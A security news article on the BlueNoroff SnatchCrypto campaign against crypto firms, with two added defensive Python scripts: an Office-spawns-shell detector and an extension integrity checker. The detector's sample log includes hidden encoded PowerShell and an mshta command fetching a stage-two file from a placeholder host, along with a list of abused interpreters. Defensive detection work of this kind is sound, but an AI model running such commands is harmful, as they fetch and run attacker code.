Unwary employees of crypto and fintech startups may be tricked into opening weaponized crypto documents that activate the SnatchCrypto malware.

Cryptocurrency stakeholders beware: an advanced persistent threat (APT) campaign is being aimed at small and medium-sized enterprises worldwide that can result in major cryptocurrency losses for the victims.

The campaign, dubbed SnatchCrypto, targets firms that deal with cryptocurrencies, smart contracts, DeFi, blockchain, and the FinTech industry.

The APT perpetrator, BlueNoroff, has started fake venture capital firms to gain the trust of potential victims. The group then sends employees of targeted firms a crypto “contract” or other weaponized Word business document that delivers a full-featured Windows backdoor with surveillance functions.

BlueNoroff is part of the larger Lazarus group and uses a diversified structure and sophisticated attack technologies for attacks on banks and servers connected to SWIFT. Victims’ devices that have downloaded the legitimate-looking fake apps will, after a while, receive backdoored updates that eventually proceed to empty the victim’s crypto wallet(s).

An attentive user may spot the fishy status message at the bottom of the popup window when launching MS Word.

Method of operation

According to researchers from Kaspersky, the APT group chose the start-up crypto sector for a reason: startups often receive letters or files from unfamiliar sources. Also, most cryptocurrency businesses are small or medium-sized firms, so they do not usually invest much in their internal security. BlueNoroff understands this and takes advantage of it by using elaborate social engineering schemes to gain the trust of victims.

Once their targets have opened a weaponized document, the macro does nothing until an internet connection is established. At that point, another macro-enabled document is downloaded to the victim’s device, deploying malware.

Besides weaponized Word documents, BlueNoroff also spreads malware disguised as zipped Windows shortcut files. The malware sends the victim’s general information and a PowerShell agent to a server, which then creates a full-featured backdoor. Using this, the group deploys other malicious tools such as a keylogger and a screen capture tool to gather information furtively for weeks or months.
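The two delivery paths above (a macro in a Word document fetching a second stage, and a PowerShell agent handing control to a backdoor) share one observable on the endpoint: an Office application starting a script interpreter. The detection below is an added example written for this article, not code from Kaspersky or the original report; it runs over a few constructed process-creation records in a simplified `key=value` format, which is an assumption and not any real Sysmon or EDR schema.

```python
"""Flag Office applications spawning script interpreters.

Added example (not from the original article). The process-creation
records below are constructed and use a simplified key=value layout;
adapt parse_line() to the schema your EDR or Sysmon pipeline emits.
"""
import re
from typing import Dict, List

# Office binaries that should almost never be the parent of a shell.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Interpreters and LOLBins commonly used by macro droppers.
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                       "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Constructed sample log: one process-creation event per line.
SAMPLE_LOG = """\
ts=2022-01-13T09:12:01Z host=WS01 parent=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE child=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline="powershell.exe -nop -w hidden -enc SQBFAFgA"
ts=2022-01-13T09:12:05Z host=WS01 parent=C:\\Windows\\explorer.exe child=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE cmdline="WINWORD.EXE /n contract.docx"
ts=2022-01-13T09:15:44Z host=WS02 parent=C:\\Windows\\explorer.exe child=C:\\Windows\\System32\\cmd.exe cmdline="cmd.exe /c dir"
ts=2022-01-13T09:20:10Z host=WS03 parent=C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE child=C:\\Windows\\System32\\mshta.exe cmdline="mshta.exe http://example.invalid/stage2.hta"
"""

LINE_RE = re.compile(
    r'ts=(?P<ts>\S+) host=(?P<host>\S+) parent=(?P<parent>.+?) '
    r'child=(?P<child>.+?) cmdline="(?P<cmdline>.*)"$'
)
# PowerShell's -e / -enc / -EncodedCommand switches, a common hiding technique.
ENCODED_RE = re.compile(r"(?i)\s-(e|enc|encodedcommand)\s")


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_line(line: str) -> Dict[str, str]:
    m = LINE_RE.match(line)
    if not m:
        raise ValueError(f"unparseable record: {line!r}")
    return m.groupdict()


def find_office_spawned_shells(log_text: str) -> List[Dict[str, str]]:
    """Return every record where an Office app is the parent of a script host."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        parent, child = basename(rec["parent"]), basename(rec["child"])
        if parent in OFFICE_PARENTS and child in SUSPICIOUS_CHILDREN:
            rec["parent_name"] = parent
            rec["child_name"] = child
            rec["encoded_cmd"] = bool(ENCODED_RE.search(rec["cmdline"]))
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for h in find_office_spawned_shells(SAMPLE_LOG):
        print(f"{h['ts']} {h['host']}: {h['parent_name']} -> {h['child_name']} "
              f"(encoded={h['encoded_cmd']}) {h['cmdline']}")
```

The rule deliberately keys on parent/child image names rather than on the document name or a download URL, because those change per campaign while the Office-spawns-shell pattern does not; the `encoded_cmd` flag is there to raise priority, not to gate the alert.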

If a prominent target is found to be using a popular browser extension to manage crypto wallets (for example, the MetaMask extension), the group replaces the main component of the extension with a fake version.
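Swapping a component of an installed extension changes files on disk, which is something a baseline integrity check will catch. The script below is an added example, not code from the article, Kaspersky or any wallet vendor: it hashes every file of an extension directory while the install is known to be clean, then compares a later snapshot against that baseline and reports modified, added and removed files. The tiny extension it builds in a temporary directory is a constructed stand-in, and the file layout is an assumption rather than any particular browser's.

```python
"""Baseline-and-compare integrity check for an installed browser extension.

Added example (not the article's code). The extension files are
constructed; point hash_tree() at the real extension directory of the
browser profile you want to watch.
"""
import hashlib
import json
import os
import tempfile
from typing import Dict, List


def hash_tree(root: str) -> Dict[str, str]:
    """Return {relative_path: sha256_hex} for every file under root."""
    digests: Dict[str, str] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            h = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            digests[rel] = h.hexdigest()
    return digests


def compare_tree(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Classify differences between a trusted baseline and a later snapshot."""
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    return {"modified": modified, "added": added, "removed": removed}


def write_files(root: str, files: Dict[str, bytes]) -> None:
    """Materialise a {relative_path: bytes} mapping under root."""
    for rel, data in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)


# Constructed minimal extension: a manifest, a background script and a UI bundle.
CLEAN_EXTENSION = {
    "manifest.json": json.dumps({"name": "wallet-ext", "version": "1.0",
                                 "background": {"service_worker": "background.js"}}).encode(),
    "background.js": b"chrome.runtime.onInstalled.addListener(() => {});\n",
    "ui/popup.js": b"document.title = 'Wallet';\n",
}


def demo() -> Dict[str, List[str]]:
    """Baseline a clean install, simulate a swapped component, re-check."""
    with tempfile.TemporaryDirectory() as ext_dir:
        write_files(ext_dir, CLEAN_EXTENSION)
        baseline = hash_tree(ext_dir)  # captured while the install is known-good

        # Simulated tampering: the main script is replaced and an extra file appears.
        write_files(ext_dir, {
            "background.js": b"/* replaced component */ console.log('tampered');\n",
            "inject.js": b"// file not present in the baseline\n",
        })
        return compare_tree(baseline, hash_tree(ext_dir))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

In practice the baseline should be stored outside the profile directory (and ideally signed or kept on another host), otherwise the same tampering that swaps the extension can update the baseline too; a legitimate extension update will also show up as "modified", so compare the recorded version in `manifest.json` before treating a diff as an incident.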

Time for the payoff!

Ultimately, when any large crypto transfers and related activities are detected on the victims’ devices, the malware will notify the attackers, who can then intercept the transaction process and inject their own logic. To complete the initiated payment, the victim then clicks the “approve” button—at which point the attackers can change the recipient’s address and maximize the transaction amount, essentially draining the account in one move.

According to Seongsu Park, senior security researcher in Kaspersky’s Global Research and Analysis Team (GReAT): “As attackers continuously come up with a lot of new tricks, even small businesses should educate their employees on basic cybersecurity practices. This is especially essential if the company works with crypto wallets: it is an attractive target for APT and cybercriminals alike. Therefore, this sector needs to be well protected.”